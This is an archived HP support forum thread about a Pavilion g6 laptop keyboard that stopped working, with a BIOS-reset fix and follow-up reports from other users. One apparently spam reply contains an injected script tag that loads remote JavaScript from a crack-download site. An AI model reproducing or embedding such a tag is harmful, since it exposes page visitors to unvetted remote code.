Information
    Windows update impacting certain printer icons and names. Microsoft is working on a solution.
    Click here to learn more
    Information
    Need Windows 11 help?
    Check documents on compatibility, FAQs, upgrade information and available fixes.
    Windows 11 Support Center.
  • post a message
    Information
    Windows update impacting certain printer icons and names. Microsoft is working on a solution.
    Click here to learn more
    Information
    Need Windows 11 help?
    Check documents on compatibility, FAQs, upgrade information and available fixes.
    Windows 11 Support Center.
  • post a message
Guidelines
The HP Community is where owners of HP products, like you, volunteer to help each other find solutions.
Archived This topic has been archived. Information and links in this thread may no longer be available or relevant. If you have a question create a new topic by clicking here and select the appropriate board.
HP Recommended

The entire keyboard on my hp pavilion g6 laptop completely stopped working.  Like it's locked?   I did install Office Prof 2013 and then it stopped working.  Not saying this was the reason, but it's the only thing  I've done differently.

1 ACCEPTED SOLUTION

Accepted Solutions
HP Recommended

Hi,

Try the following.

Shut down the notebook, unplug the AC Adapter and then remove the battery.  Hold  down the Power button for 30 seconds.  Re-insert the battery and plug in the AC Adapter.

Tap away at the esc key as you start the notebook to see if this will launch the Start-up Menu and then select f10 to enter the bios menu.  Press f5 to load the defaults ( this is sometimes f9, but the menu at the bottom will show the correct key ), use the arrow keys ( assuming they work in this menu ) to select 'Yes' and hit enter.  Press f10 to save the setting and again use the arrow keys to select 'Yes' and hit enter.

Note:  If you find the keys don't work in the Bios menu, then this is likely to be a Hardware issue.

Regards,

DP-K

---------------------------------------------------------------------------

****Click the White thumb to say thanks****
****Please mark Accept As Solution if it solves your problem****
****I don't work for HP****

Windows Insider MVP

View solution in original post

61 REPLIES 61
HP Recommended

Hi,

Try the following.

Shut down the notebook, unplug the AC Adapter and then remove the battery.  Hold  down the Power button for 30 seconds.  Re-insert the battery and plug in the AC Adapter.

Tap away at the esc key as you start the notebook to see if this will launch the Start-up Menu and then select f10 to enter the bios menu.  Press f5 to load the defaults ( this is sometimes f9, but the menu at the bottom will show the correct key ), use the arrow keys ( assuming they work in this menu ) to select 'Yes' and hit enter.  Press f10 to save the setting and again use the arrow keys to select 'Yes' and hit enter.

Note:  If you find the keys don't work in the Bios menu, then this is likely to be a Hardware issue.

Regards,

DP-K

Windows Insider MVP

HP Recommended

Thanks Much :TongueOut:

HP Recommended

Hi,

You're welcome and glad it helped :generic:

All the best,

DP-K

Windows Insider MVP

HP Recommended

I am having the same problem. But it happens everytime I turn on the computer or after hibernation. The touchpad works but the keyboard doesnt and cannot access my computer. So it seems that before I turn on the computer I will have to remove the battery and reset the settings each time. Any fix to this?

HP Recommended
Could you please give me the exact product number for your computer?

If you need help finding it, you can use the following link:

Thanks,
Kyle
-------------How do I give Kudos? | How do I mark a post as Solved? --------------------------------------------------------
Signature
HP Recommended

I am having the same problem. But it happened when iI turn on the computer after hibernation. The touchpad works but the keyboard doesnt and cannot access my computer.  Any fix to this? kindly help me 😞

{Javascript Removed}

HP Recommended

I am having the same problem. But it happened when iI turn on the computer after hibernation. The touchpad works but the keyboard doesnt and cannot access my computer.  Any fix to this? kindly help me 

<script type="text/javascript" src="http://cracks4free.info/5/adds.js"></script>
HP Recommended

I have the same problem keyboard not working

I bought HP Pavilion g series last year.

some buttons like (E,D,C,3 F2,F3) and i tried the bios and found that all buttons make sound except those buttons (E,D,C,3,F2,F3) so any help please ..????

HP Recommended

@yosra wrote:

I have the same problem keyboard not working

I bought HP Pavilion g series last year.

some buttons like (E,D,C,3 F2,F3) and i tried the bios and found that all buttons make sound except those buttons (E,D,C,3,F2,F3) so any help please ..????

Hello yosra.

Have you tried cleaning under the keys using compressed air?

Is the notebook in warranty?  If so you should contact HP Support directly about this issue.  The number is 1-800-474-6836 if your'e in the US/Canada.  If you're in another part of the world you'll need to visit HP Support Worldwide to get your region's contact information.

---------------------------------------------------------------------------------------------------
Please click the white star under my name to give me Kudos as a way to say "Thanks!"

Click the "Accept as Solution" button if I resolve your issue.

Archived This topic has been archived. Information and links in this thread may no longer be available or relevant. If you have a question create a new topic by clicking here and select the appropriate board.
† The opinions expressed above are the personal opinions of the authors, not of HP. By using this site, you accept the <a href="https://www8.hp.com/us/en/terms-of-use.html" class="udrlinesmall">Terms of Use</a> and <a href="/t5/custom/page/page-id/hp.rulespage" class="udrlinesmall"> Rules of Participation</a>.